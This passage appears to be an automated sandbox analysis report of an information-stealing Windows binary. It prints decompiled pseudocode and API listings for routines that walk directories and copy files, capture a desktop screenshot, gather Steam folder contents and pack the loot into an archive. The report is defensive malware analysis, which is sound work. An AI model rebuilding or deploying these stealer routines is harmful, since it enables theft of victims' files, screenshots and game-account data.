								_t141 = _t97;
								if(_t97 != 0) {
									__eflags =  *0x447510( &(_v1128.cFileName),  *0x446a4c);
									if(__eflags != 0) {
										_t101 = GetFileAttributesA( &_v544); // executed
										__eflags = _t101 - 0xffffffff;
										if(_t101 == 0xffffffff) {
											L11:
											_t103 =  *0x447510( &(_v1128.cFileName),  *0x446d8c);
											__eflags = _t103;
											if(_t103 != 0) {
												_t105 =  *0x447510( &(_v1128.cFileName),  *0x446ae4);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags = _v1128.dwFileAttributes & 0x00000010;
													if((_v1128.dwFileAttributes & 0x00000010) != 0) {
														goto L19;
													}
												} else {
													__eflags =  *((char*)(_v1140 + 1));
													if(__eflags != 0) {
														E00410302(_t118,  &_v280, _t132, _t133, __eflags, _v1144, _t132, _v1136, _v1132, _t118); // executed
														E00410609( &_v280, _v1144, _t132, _t118); // executed
														goto L14;
													}
													goto L19;
												}
											} else {
												_t112 = _v1140;
												__eflags =  *((char*)(_t112 + 2));
												if( *((char*)(_t112 + 2)) != 0) {
													E004107FB( &_v280, _v1144, _t132, _t118); // executed
													E004109CC( &_v280, _v1144, _t132, _v1148); // executed
													L14:
													_t118 = _v1148;
												}
												goto L19;
											}
										} else {
											__eflags = _t101 & 0x00000010;
											if(__eflags != 0) {
												goto L11;
											} else {
												_t115 =  &_v544;
												_t129 =  &(_v1128.cFileName);
												goto L7;
											}
										}
									} else {
										_t129 = _v1144;
										_t115 =  &_v280;
										L7:
										_t131 = _t132;
										E0040FE4B(_t118, _t129, _t132, _t132, _t133, __eflags, _t115, _v1136, _v1132, _t118); // executed
										goto L19;
									}
								} else {
									E0040FBAD(_t118,  &_v280, _t132, _t133, _t141, _v1144, _t132, _v1136, _v1132); // executed
									L19:
									E00411603(_v1140, _t131,  &(_v1128.cFileName),  &_v280, _t132, _v1136, _v1132, _t118, _t133); // executed
								}
							}
						}
						_t85 = FindNextFileA(_v1156,  &_v1128); // executed
					} while (_t85 != 0);
					_t80 = FindClose(_v1156);
				}
				return E0041F69E(_t80, _t118, _v12 ^ _t134, _t131, _t132, _t133);
			}

0x00411603
0x0041160c
0x00411613
0x0041161a
0x0041161e
0x00411622
0x00411625
0x0041162b
0x0041162e
0x00411638
0x0041163e
0x00411653
0x00411659
0x0041165f
0x00411665
0x00411676
0x0041167c
0x00411685
0x0041168b
0x0041168b
0x00411696
0x0041169f
0x004116a5
0x004116b0
0x004116b9
0x004116d8
0x004116ec
0x00411719
0x0041171f
0x0041172f
0x00411735
0x00411737
0x0041176f
0x00411771
0x004117a0
0x004117a6
0x004117a9
0x004117bd
0x004117ca
0x004117d0
0x004117d2
0x00411820
0x00411826
0x00411828
0x0041186a
0x00411871
0x00000000
0x00000000
0x0041182a
0x00411830
0x00411834
0x00411850
0x00411863
0x00000000
0x00411863
0x00000000
0x00411834
0x004117d4
0x004117d4
0x004117da
0x004117de
0x004117f2
0x00411806
0x0041180b
0x0041180b
0x0041180b
0x00000000
0x004117de
0x004117ab
0x004117ab
0x004117ad
0x00000000
0x004117af
0x004117af
0x004117b5
0x00000000
0x004117b5
0x004117ad
0x00411773
0x00411773
0x00411779
0x0041177f
0x00411786
0x0041178f
0x00000000
0x0041178f
0x00411739
0x00411752
0x00411873
0x00411896
0x00411896
0x00411737
0x004116b9
0x004118a8
0x004118ae
0x004118bc
0x004118bc
0x004118d0

APIs

wsprintfA.USER32 ref: 0041165F
FindFirstFileA.KERNEL32(?,?), ref: 00411676
StrCmpCA.SHLWAPI(?,0043F354), ref: 00411697
StrCmpCA.SHLWAPI(?,0043F358), ref: 004116B1
wsprintfA.USER32 ref: 004116D8
_memset.LIBCMT ref: 004116EC
wsprintfA.USER32 ref: 00411719
StrCmpCA.SHLWAPI(?), ref: 0041172F
StrCmpCA.SHLWAPI(?), ref: 00411769

Part of subcall function 0040FBAD: __EH_prolog3_GS.LIBCMT ref: 0040FBB7
Part of subcall function 0040FBAD: _memset.LIBCMT ref: 0040FBE7
Part of subcall function 0040FBAD: lstrcat.KERNEL32(?,?), ref: 0040FBFC
Part of subcall function 0040FBAD: lstrcat.KERNEL32(?,00000000), ref: 0040FC12
Part of subcall function 0040FBAD: CopyFileA.KERNEL32(?,?,00000001), ref: 0040FC22
Part of subcall function 0040FBAD: StrCmpCA.SHLWAPI(?,0043D12C), ref: 0040FD11
Part of subcall function 0040FBAD: StrCmpCA.SHLWAPI(?,0043D12C), ref: 0040FD26

FindNextFileA.KERNELBASE(?,?), ref: 004118A8
FindClose.KERNEL32(?), ref: 004118BC

Strings

%s\%s\%s\%s, xrefs: 00411713
%s\*, xrefs: 0041164D
%s\%s, xrefs: 004116D2

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: FileFindwsprintf$_memsetlstrcat$CloseCopyFirstH_prolog3_Next
String ID: %s\%s$%s\%s\%s\%s$%s\*
API String ID: 710274362-3933763253
Opcode ID: a5c211d7abc6842e7bf7d43b457e36c4fa003c68c80d2f2fd5835c164816278b
Instruction ID: 1e298e8708004bd89270dcb5f97361604f278678df94758f6d6a01938060d6f4
Opcode Fuzzy Hash: a5c211d7abc6842e7bf7d43b457e36c4fa003c68c80d2f2fd5835c164816278b
Instruction Fuzzy Hash: 43711CB190421DABCF209F61CC45FDABB79EB45305F0044EAF609A2161EB359A89CF29

Uniqueness

Uniqueness Score: -1.00%

Function 004182AF Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 133
windowCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E004182AF(void* __edx) {
				signed int _v8;
				char _v24;
				struct tagRECT _v40;
				struct HDC__* _v44;
				char _v48;
				void* _v52;
				void* _v56;
				char _v60;
				intOrPtr _v64;
				void* _v68;
				char _v72;
				int _v76;
				int _v80;
				int _v84;
				char _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				intOrPtr _t41;
				void* _t46;
				void* _t50;
				struct HDC__* _t54;
				void* _t56;
				void* _t60;
				void* _t64;
				int _t66;
				void* _t77;
				void* _t82;
				signed int _t86;

				_t82 = __edx;
				_t39 =  *0x444664; // 0xfa3a0753
				_v8 = _t39 ^ _t86;
				_t41 =  *0x4472ac; // 0x0
				_t85 = 0;
				_v64 = _t41;
				_t84 = 1;
				_v88 = 1;
				_v84 = 0;
				_v80 = 0;
				_v76 = 0;
				E0041F6B0( &_v88, 0, 0x10);
				_v88 = 1;
				_t46 =  *0x4474ec( &_v72,  &_v88, 0); // executed
				if(_t46 == 0) {
					_t50 =  *0x44744c(0, 1,  &_v60); // executed
					if(_t50 == 0) {
						_t84 = GetDesktopWindow();
						GetWindowRect(_t84,  &_v40);
						_t54 = GetDC(_t84);
						_v44 = _t54;
						_t77 = CreateCompatibleDC(_t54);
						_t56 = CreateCompatibleBitmap(_v44, _v40.right, _v40.bottom);
						_v56 = _t56;
						_v68 = SelectObject(_t77, _t56);
						BitBlt(_t77, 0, 0, _v40.right, _v40.bottom, _v44, 0, 0, 0xcc0020);
						_t60 =  *0x4474ac(_v56, 0,  &_v48); // executed
						if(_t60 == 0 && E00418217(_t84,  &_v24) != 0xffffffff) {
							_t64 =  *0x447480(_v48, _v60,  &_v24, 0); // executed
							if(_t64 == 0) {
								_t66 =  *0x447348(_v60,  &_v52);
								GlobalFix(_v52);
								_t85 = _t66;
								E0041EAE0(_v64, "\\screenshot.jpg", GlobalSize(_v52), 3);
								SelectObject(_t77, _v68);
								 *0x4473c0(_v48); // executed
								 *0x4474cc(_v72);
								DeleteObject(_v56);
								DeleteObject(_t77);
								ReleaseDC(_t84, _v44);
								CloseWindow(_t84); // executed
							}
						}
					}
				}
				return E0041F69E(0, _t77, _v8 ^ _t86, _t82, _t84, _t85);
			}

0x004182af
0x004182b5
0x004182bc
0x004182bf
0x004182c7
0x004182cb
0x004182d4
0x004182d6
0x004182d9
0x004182dc
0x004182df
0x004182e2
0x004182f3
0x004182f6
0x004182fe
0x0041830a
0x00418312
0x0041831e
0x00418325
0x0041832c
0x00418333
0x0041833f
0x00418347
0x0041834f
0x00418362
0x0041836e
0x0041837c
0x00418384
0x004183a8
0x004183b0
0x004183b9
0x004183c2
0x004183cb
0x004183e0
0x004183ec
0x004183f5
0x004183fe
0x00418407
0x0041840e
0x00418418
0x0041841f
0x0041841f
0x004183b0
0x00418384
0x00418312
0x00418435

APIs

_memset.LIBCMT ref: 004182E2
GetDesktopWindow.USER32 ref: 00418318
GetWindowRect.USER32(00000000,?), ref: 00418325
GetDC.USER32(00000000), ref: 0041832C
CreateCompatibleDC.GDI32(00000000), ref: 00418336
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00418347
SelectObject.GDI32(00000000,00000000), ref: 00418352
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041836E
GlobalFix.KERNEL32(?), ref: 004183C2
GlobalSize.KERNEL32(?), ref: 004183CD
SelectObject.GDI32(00000000,?), ref: 004183EC
DeleteObject.GDI32(?), ref: 00418407
DeleteObject.GDI32(00000000), ref: 0041840E
ReleaseDC.USER32(00000000,?), ref: 00418418
CloseWindow.USER32(00000000), ref: 0041841F

Strings

\screenshot.jpg, xrefs: 004183D9

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: Object$Window$CompatibleCreateDeleteGlobalSelect$BitmapCloseDesktopRectReleaseSize_memset
String ID: \screenshot.jpg
API String ID: 591712143-3844582059
Opcode ID: 117c076429ef40346eabe28b22e0b52ae06ec0327be540c9c7542adb399f31f3
Instruction ID: a308602cbf706bb20b6c97af1884e31f9446fc8087fe4f4fa927c5af7ba218ef
Opcode Fuzzy Hash: 117c076429ef40346eabe28b22e0b52ae06ec0327be540c9c7542adb399f31f3
Instruction Fuzzy Hash: 2441FA76904118AFCB119FE5EC48DEEBFBDFF4A711B104029F902E2120DB35495ADB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040C3ED Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 92
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E0040C3ED(void* __ebx, void* __edi, intOrPtr _a4) {
				signed int _v12;
				char _v280;
				char _v544;
				char _v808;
				struct _WIN32_FIND_DATAA _v1128;
				void* _v1132;
				void* __esi;
				signed int _t24;
				int _t31;
				intOrPtr _t56;
				void* _t58;
				void* _t62;
				void* _t63;
				signed int _t65;
				void* _t66;
				void* _t67;

				_t63 = __edi;
				_t58 = __ebx;
				_t24 =  *0x444664; // 0xfa3a0753
				_v12 = _t24 ^ _t65;
				wsprintfA( &_v808, "%s\\%s", __edi, _a4);
				_t67 = _t66 + 0x10;
				_t31 = FindFirstFileA( &_v808,  &_v1128); // executed
				_v1132 = _t31;
				if(_t31 == 0xffffffff) {
					L7:
					return E0041F69E(_t31, _t58, _v12 ^ _t65, _t62, _t63, 0x104);
				}
				do {
					_push(".");
					_push( &(_v1128.cFileName));
					if( *0x447510() != 0) {
						_push("..");
						_push( &(_v1128.cFileName));
						if( *0x447510() != 0) {
							E0041F6B0( &_v544, 0, 0x104);
							E0041F6B0( &_v280, 0, 0x104);
							 *0x4474e0( &_v544, "\\Soft\\Steam\\");
							 *0x4474e0( &_v544,  &(_v1128.cFileName));
							 *0x4474e0( &_v280, _t63);
							 *0x4474e0( &_v280, "\\");
							 *0x4474e0( &_v280,  &(_v1128.cFileName));
							_t56 =  *0x4472ac; // 0x0
							E0041EAE0(_t56,  &_v544, 0, 2);
							_t67 = _t67 + 0x24;
						}
					}
				} while (FindNextFileA(_v1132,  &_v1128) != 0);
				_t31 = FindClose(_v1132);
				goto L7;
			}

0x0040c3ed
0x0040c3ed
0x0040c3f6
0x0040c3fd
0x0040c412
0x0040c418
0x0040c429
0x0040c42f
0x0040c438
0x0040c53a
0x0040c546
0x0040c546
0x0040c443
0x0040c443
0x0040c44e
0x0040c457
0x0040c45d
0x0040c468
0x0040c471
0x0040c481
0x0040c493
0x0040c4a7
0x0040c4bb
0x0040c4c9
0x0040c4db
0x0040c4ef
0x0040c500
0x0040c50b
0x0040c510
0x0040c510
0x0040c471
0x0040c526
0x0040c534
0x00000000

APIs

wsprintfA.USER32 ref: 0040C412
FindFirstFileA.KERNEL32(?,?), ref: 0040C429
StrCmpCA.SHLWAPI(?,0043F354), ref: 0040C44F
StrCmpCA.SHLWAPI(?,0043F358), ref: 0040C469
_memset.LIBCMT ref: 0040C481
_memset.LIBCMT ref: 0040C493
lstrcat.KERNEL32(?,\Soft\Steam\), ref: 0040C4A7
lstrcat.KERNEL32(?,?), ref: 0040C4BB
lstrcat.KERNEL32(?), ref: 0040C4C9
lstrcat.KERNEL32(?,0043D134), ref: 0040C4DB
lstrcat.KERNEL32(?,?), ref: 0040C4EF
FindNextFileA.KERNEL32(?,?), ref: 0040C520
FindClose.KERNEL32(?), ref: 0040C534

Strings

\Soft\Steam\, xrefs: 0040C49B
%s\%s, xrefs: 0040C40C

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File_memset$CloseFirstNextwsprintf
String ID: %s\%s$\Soft\Steam\
API String ID: 2894742787-2995071678
Opcode ID: 92ece0a59fdf60eba197eb0d78cc425b73ae5e5d146c886a5a87af1a0647e5cd
Instruction ID: fd805a1b0f261d68c57584ce38a1489cc42d0327fd75843cf0321be292b4fe96
Opcode Fuzzy Hash: 92ece0a59fdf60eba197eb0d78cc425b73ae5e5d146c886a5a87af1a0647e5cd
Instruction Fuzzy Hash: 773125B690021CABCB20DF60DD49FDA777CAB09744F5005B6B609E3151EB34A789CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0041E31F Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 443
COMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E0041E31F(signed int __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v32;
				char _v33;
				char _v44;
				char _v56;
				char _v320;
				signed int _v324;
				signed int _v328;
				char _v336;
				char _v596;
				char _v856;
				signed int _v860;
				char* _v864;
				char* _v868;
				char _v1128;
				intOrPtr _v1132;
				intOrPtr _v1136;
				short _v1140;
				short _v1142;
				short _v1144;
				signed int _v1148;
				intOrPtr _v1152;
				intOrPtr _v1156;
				int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				unsigned int _v1176;
				signed int _v1178;
				signed int _v1180;
				short _v1182;
				char _v1184;
				char _v1185;
				char _v1186;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t218;
				intOrPtr _t220;
				char* _t225;
				intOrPtr _t226;
				int _t233;
				short _t238;
				signed int _t240;
				signed int _t242;
				signed int _t251;
				signed int _t254;
				signed int _t257;
				signed int _t263;
				signed char _t271;
				char _t272;
				signed int _t275;
				signed int _t277;
				signed int _t278;
				signed int* _t285;
				signed int _t289;
				signed int _t290;
				signed int _t292;
				signed int _t295;
				signed int _t300;
				signed int _t306;
				signed int _t311;
				void* _t313;
				signed int _t314;
				signed int _t340;
				signed int _t341;
				signed int _t344;
				char* _t348;
				signed int _t360;
				signed int _t362;
				signed int _t363;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed char* _t373;
				intOrPtr _t375;
				signed int _t379;

				_t349 = __edx;
				_t218 =  *0x444664; // 0xfa3a0753
				_v12 = _t218 ^ _t379;
				_t220 = _a4;
				_t314 = __edx;
				_t365 = 0;
				_v1200 = __ecx;
				if( *((intOrPtr*)(__edx + 0x14)) == 0) {
					__eflags =  *((char*)(__edx + 0x2c));
					if( *((char*)(__edx + 0x2c)) == 0) {
						_v1196 = 0;
						__eflags =  *__edx;
						if( *__edx != 0) {
							__eflags = _a12 - 4;
							if(_a12 != 4) {
								_v1196 = 0xc;
							}
						}
						 *0x44758c( &_v320, _t220);
						__eflags = _v320;
						if(_v320 == 0) {
							L89:
							_t223 = 0x10000;
							goto L90;
						} else {
							_t225 =  &_v320;
							do {
								__eflags =  *_t225 - 0x5c;
								if( *_t225 == 0x5c) {
									 *_t225 = 0x2f;
								}
								_t225 = _t225 + 1;
								__eflags =  *_t225;
							} while ( *_t225 != 0);
							__eflags = _a12 - 4;
							_v1185 = _a12 == 4;
							__eflags = _v1185;
							if(_v1185 == 0) {
								L14:
								_v1186 = 0;
								L15:
								__eflags = _v1185;
								_v1192 = 8;
								if(_v1185 != 0) {
									L17:
									_v1192 = _t365;
									L18:
									_t226 = _a12;
									__eflags = _t226 - 2;
									if(_t226 != 2) {
										__eflags = _t226 - 1;
										if(_t226 != 1) {
											__eflags = _t226 - 3;
											if(_t226 != 3) {
												__eflags = _t226 - 4;
												if(__eflags != 0) {
													goto L89;
												}
												_t223 = E0041E03F(_t314, _t349, __eflags);
												L26:
												_t361 = 0;
												__eflags = _t223;
												if(_t223 != 0) {
													goto L90;
												}
												_v324 = 0;
												 *0x44758c( &_v1128, 0x43d12c);
												 *0x44758c( &_v856,  &_v320);
												_t233 = lstrlenA( &_v856);
												__eflags = _v1186;
												_v1160 = _t233;
												if(_v1186 != 0) {
													 *0x4474e0( &_v856, "/");
													_t39 =  &_v1160;
													 *_t39 = _v1160 + 1;
													__eflags =  *_t39;
												}
												 *0x44758c( &_v596, 0x43d12c);
												__eflags =  *_t314;
												_v1142 = 0;
												_v1184 = 0xb17;
												_t238 = 0x14;
												_v1182 = _t238;
												_v1176 =  *((intOrPtr*)(_t314 + 0x68));
												_t240 = 8;
												_v860 = _t361;
												_v1148 = _t361;
												_v328 = _t361;
												_v1172 = _t361;
												_v336 = 1;
												_v1180 = _t240;
												_t362 = 9;
												if( *_t314 != 0) {
													__eflags = _v1185;
													if(_v1185 == 0) {
														_v1180 = _t362;
													}
												}
												_v1140 = _v1180;
												_t242 = _v1192;
												_v1178 = _t242;
												__eflags = _t242;
												if(_t242 != 0) {
													L35:
													_t62 =  &_v1168;
													 *_t62 = _v1168 & 0x00000000;
													__eflags =  *_t62;
													goto L36;
												} else {
													_t306 =  *(_t314 + 0x70);
													__eflags = _t306;
													if(_t306 < 0) {
														goto L35;
													}
													_v1168 = _t306 + _v1196;
													L36:
													_v1164 =  *(_t314 + 0x70);
													_t367 =  *(_t314 + 0x58);
													_v1144 = 0;
													_v1136 =  *((intOrPtr*)(_t314 + 0x4c));
													_v1132 =  *((intOrPtr*)(_t314 + 0x10)) +  *(_t314 + 0x18);
													_v868 =  &_v32;
													_v864 =  &_v56;
													_v27 =  *(_t314 + 0x58);
													_t251 =  *(_t314 + 0x5c);
													_v26 = (_t251 << 0x00000020 | _t367) >> 8;
													_v25 = (_t251 << 0x00000020 | _t367) >> 0x10;
													_t368 =  *(_t314 + 0x50);
													_v24 = (_t251 << 0x00000020 | _t367) >> 0x18;
													_v23 =  *(_t314 + 0x50);
													_t254 =  *(_t314 + 0x54);
													_v22 = (_t254 << 0x00000020 | _t368) >> 8;
													_v21 = (_t254 << 0x00000020 | _t368) >> 0x10;
													_t369 =  *(_t314 + 0x60);
													_v20 = (_t254 << 0x00000020 | _t368) >> 0x18;
													_v19 =  *(_t314 + 0x60);
													_t257 =  *(_t314 + 0x64);
													_v18 = (_t257 << 0x00000020 | _t369) >> 8;
													_t360 = _t257;
													_v17 = (_t360 << 0x00000020 | _t369) >> 0x10;
													_v1156 = 0x11;
													_v1152 = _t362;
													_v32 = 0xd5455;
													_v28 = 7;
													_t349 = _t360 >> 0x10;
													_v16 = (_t257 << 0x00000020 | _t369) >> 0x18;
													E0041F8C0( &_v56,  &_v32, _t362);
													 *((char*)(_v864 + 2)) = 5;
													_t361 = _t314;
													_t263 = E0041CEA7(_t314, (_t257 << 0x00000020 | _t369) >> 0x18, _t314,  &_v1184);
													__eflags = _t263;
													if(_t263 == 0) {
														 *(_t314 + 0x18) =  *(_t314 + 0x18) + _v1156 + _v1160 + 0x1e;
														__eflags =  *(_t314 + 0x14);
														if( *(_t314 + 0x14) == 0) {
															_t371 =  *_t314;
															_t337 = _t314 + 0x30;
															 *((intOrPtr*)(_t314 + 0x30)) = 0x12345678;
															 *((intOrPtr*)(_t314 + 0x34)) = 0x23456789;
															 *((intOrPtr*)(_t314 + 0x38)) = 0x34567890;
															__eflags = _t371;
															if(_t371 == 0) {
																L44:
																__eflags =  *0x4477d0;
																if( *0x4477d0 == 0) {
																	_t300 = GetDesktopWindow();
																	__eflags = _t300 ^ GetTickCount();
																	E00422F99(_t300 ^ GetTickCount());
																}
																_t372 = 0;
																__eflags = 0;
																do {
																	 *((char*)(_t379 + _t372 - 0x28)) = E00422FAB(__eflags) >> 7;
																	_t372 = _t372 + 1;
																	__eflags = _t372 - 0xc;
																} while (__eflags < 0);
																_v33 = _v1176 >> 8;
																_t363 = 0;
																__eflags = 0;
																do {
																	_t373 = _t379 + _t363 - 0x28;
																	_t271 = E0041D889(_t314 + 0x30, __eflags,  *_t373 & 0x000000ff);
																	_t363 = _t363 + 1;
																	_pop(_t339);
																	 *_t373 = _t271;
																	__eflags = _t363 - 0xc;
																} while (__eflags < 0);
																__eflags =  *_t314;
																if( *_t314 != 0) {
																	__eflags = _v1185;
																	if(_v1185 == 0) {
																		_t339 = _t314;
																		E0041DC65(_t314,  &_v44, 0xc);
																		_t162 = _t314 + 0x18;
																		 *_t162 =  *(_t314 + 0x18) + 0xc;
																		__eflags =  *_t162;
																	}
																}
																_t361 = 0;
																__eflags =  *_t314;
																if( *_t314 == 0) {
																	L56:
																	_t272 = 0;
																	__eflags = 0;
																	goto L57;
																} else {
																	__eflags = _v1185;
																	if(_v1185 != 0) {
																		goto L56;
																	}
																	_t272 = 1;
																	L57:
																	__eflags = _v1185;
																	 *((char*)(_t314 + 0x2d)) = _t272;
																	if(_v1185 != 0) {
																		 *(_t314 + 0x90) = 0;
																		L64:
																		_t365 = _t314;
																		 *((char*)(_t314 + 0x2d)) = 0;
																		E0041E17F(_t314);
																		_t340 =  *(_t314 + 0x90);
																		_t223 =  *(_t314 + 0x14);
																		 *(_t314 + 0x18) =  *(_t314 + 0x18) + _t340;
																		__eflags =  *(_t314 + 0x14);
																		if( *(_t314 + 0x14) != 0) {
																			goto L90;
																		}
																		__eflags = _t361;
																		if(_t361 != 0) {
																			L38:
																			_t223 = 0x400;
																			goto L90;
																		}
																		_t349 =  *(_t314 + 0x78);
																		_t275 = _v1196 + _t340;
																		__eflags = _v1168 - _t275;
																		_v1168 = _t275;
																		_t341 = _t340 & 0xffffff00 | _v1168 == _t275;
																		__eflags =  *((char*)(_t314 + 0x1c));
																		_v1172 =  *(_t314 + 0x78);
																		_v1164 =  *(_t314 + 0x70);
																		if( *((char*)(_t314 + 0x1c)) == 0) {
																			L76:
																			_t277 = _v1192;
																			__eflags = _v1178 - _t277;
																			if(_v1178 == _t277) {
																				__eflags = _t277;
																				if(_t277 != 0) {
																					L80:
																					_t361 = _t314;
																					_t365 =  &_v1184;
																					_t278 = E0041D109(_t341, _t314,  &_v1184);
																					__eflags = _t278;
																					if(_t278 != 0) {
																						goto L38;
																					}
																					_t204 = _t314 + 0x18;
																					 *_t204 =  *(_t314 + 0x18) + 0x10;
																					__eflags =  *_t204;
																					_v1180 = _v1140;
																					L82:
																					_t223 =  *(_t314 + 0x14);
																					__eflags =  *(_t314 + 0x14);
																					if(__eflags != 0) {
																						goto L90;
																					}
																					_t375 = E00420467(_t314, _t349, _t361, _t365, __eflags, _v1152);
																					E0041F8C0(_t375, _v864, _v1152);
																					_v864 = _t375;
																					_t365 = 0x360;
																					_t361 = E00420467(_t314, _t349, _t361, 0x360, __eflags, 0x360);
																					E0041F8C0(_t361,  &_v1184, 0x360);
																					_t344 =  *(_t314 + 0x44);
																					__eflags = _t344;
																					if(_t344 != 0) {
																						while(1) {
																							_t285 = _t344 + 0x35c;
																							__eflags =  *_t285;
																							if( *_t285 == 0) {
																								break;
																							}
																							_t344 =  *_t285;
																						}
																						 *(_t344 + 0x35c) = _t361;
																						L88:
																						_t223 = 0;
																						goto L90;
																					}
																					 *(_t314 + 0x44) = _t361;
																					goto L88;
																				}
																				__eflags = _t341;
																				if(_t341 == 0) {
																					goto L77;
																				}
																				goto L80;
																			}
																			L77:
																			_t223 = 0x4000000;
																			goto L90;
																		}
																		__eflags =  *_t314 - _t361;
																		if( *_t314 == _t361) {
																			L69:
																			__eflags = _v1180 & 0x00000001;
																			_v1178 = _v1192;
																			if((_v1180 & 0x00000001) == 0) {
																				_t192 =  &_v1180;
																				 *_t192 = _v1180 & 0x0000fff7;
																				__eflags =  *_t192;
																			}
																			_t365 = _v1132 -  *((intOrPtr*)(_t314 + 0x10));
																			_v1140 = _v1180;
																			_t289 = E0041DD32(_t314, _v1132 -  *((intOrPtr*)(_t314 + 0x10)));
																			__eflags = _t289;
																			if(_t289 != 0) {
																				_t361 = _t314;
																				_t365 =  &_v1184;
																				_t290 = E0041CEA7(_t314, _t341, _t314,  &_v1184);
																				__eflags = _t290;
																				if(_t290 != 0) {
																					goto L38;
																				}
																				_t365 =  *(_t314 + 0x18);
																				_t292 = E0041DD32(_t314,  *(_t314 + 0x18));
																				__eflags = _t292;
																				if(_t292 != 0) {
																					goto L82;
																				}
																				goto L72;
																			} else {
																				L72:
																				_t223 = 0x2000000;
																				goto L90;
																			}
																		}
																		__eflags = _v1185;
																		if(_v1185 == 0) {
																			goto L76;
																		}
																		goto L69;
																	}
																	__eflags = _v1192 - 8;
																	if(_v1192 != 8) {
																		__eflags = _v1192;
																		if(__eflags != 0) {
																			goto L64;
																		}
																		_t295 = E0041E2C7(_t314, _t339, __eflags);
																		L62:
																		_t361 = _t295;
																		goto L64;
																	}
																	_t295 = E0041E1C0(_t314,  &_v1184); // executed
																	goto L62;
																}
															} else {
																goto L42;
															}
															while(1) {
																L42:
																_t349 =  *_t371;
																__eflags =  *_t371;
																if( *_t371 == 0) {
																	goto L44;
																}
																E0041D843(_t337);
																_t371 = _t371 + 1;
																__eflags = _t371;
																if(_t371 != 0) {
																	continue;
																}
																goto L44;
															}
															goto L44;
														}
														_t365 = _t314;
														E0041E17F(_t314);
														_t223 =  *(_t314 + 0x14);
														goto L90;
													}
													_t365 = _t314;
													E0041E17F(_t314);
													goto L38;
												}
											}
											_t349 = _v1200;
											_t223 = E0041DF7C(_t314, _a8, _v1200);
											goto L26;
										}
										_t223 = E0041DE59(_t314, _v1200, _a8);
										goto L26;
									}
									_t365 = _t314; // executed
									_t223 = E0041DDDA(_t314, _v1200); // executed
									goto L26;
								}
								_t361 =  &_v320;
								_t311 = E0041D8B5( &_v320);
								__eflags = _t311;
								if(_t311 == 0) {
									goto L18;
								}
								goto L17;
							}
							_t313 = E004201E0( &_v320);
							_t348 =  &_v320;
							__eflags =  *((char*)(_t313 + _t348 - 1)) - 0x2f;
							_v1186 = 1;
							if( *((char*)(_t313 + _t348 - 1)) != 0x2f) {
								goto L15;
							}
							goto L14;
						}
					} else {
						_t223 = 0x50000;
						goto L90;
					}
				} else {
					_t223 = 0x40000;
					L90:
					return E0041F69E(_t223, _t314, _v12 ^ _t379, _t349, _t361, _t365);
				}
			}

0x0041e31f
0x0041e328
0x0041e32f
0x0041e332
0x0041e337
0x0041e339
0x0041e33c
0x0041e345
0x0041e351
0x0041e355
0x0041e361
0x0041e367
0x0041e369
0x0041e36b
0x0041e36f
0x0041e371
0x0041e371
0x0041e36f
0x0041e383
0x0041e389
0x0041e390
0x0041e963
0x0041e963
0x00000000
0x0041e396
0x0041e396
0x0041e39c
0x0041e39c
0x0041e39f
0x0041e3a1
0x0041e3a1
0x0041e3a4
0x0041e3a5
0x0041e3a5
0x0041e3aa
0x0041e3ae
0x0041e3b5
0x0041e3bc
0x0041e3df
0x0041e3df
0x0041e3e6
0x0041e3e6
0x0041e3ed
0x0041e3f7
0x0041e408
0x0041e408
0x0041e40e
0x0041e40e
0x0041e411
0x0041e414
0x0041e425
0x0041e428
0x0041e43a
0x0041e43d
0x0041e44f
0x0041e452
0x00000000
0x00000000
0x0041e458
0x0041e45d
0x0041e45d
0x0041e45f
0x0041e461
0x00000000
0x00000000
0x0041e474
0x0041e47a
0x0041e48e
0x0041e49b
0x0041e4a1
0x0041e4a8
0x0041e4ae
0x0041e4bc
0x0041e4c2
0x0041e4c2
0x0041e4c2
0x0041e4c2
0x0041e4d0
0x0041e4d8
0x0041e4db
0x0041e4e9
0x0041e4f0
0x0041e4f1
0x0041e4fd
0x0041e503
0x0041e506
0x0041e50c
0x0041e512
0x0041e518
0x0041e51e
0x0041e528
0x0041e52f
0x0041e530
0x0041e532
0x0041e539
0x0041e53d
0x0041e53d
0x0041e539
0x0041e54b
0x0041e552
0x0041e558
0x0041e55f
0x0041e561
0x0041e578
0x0041e578
0x0041e578
0x0041e578
0x00000000
0x0041e563
0x0041e563
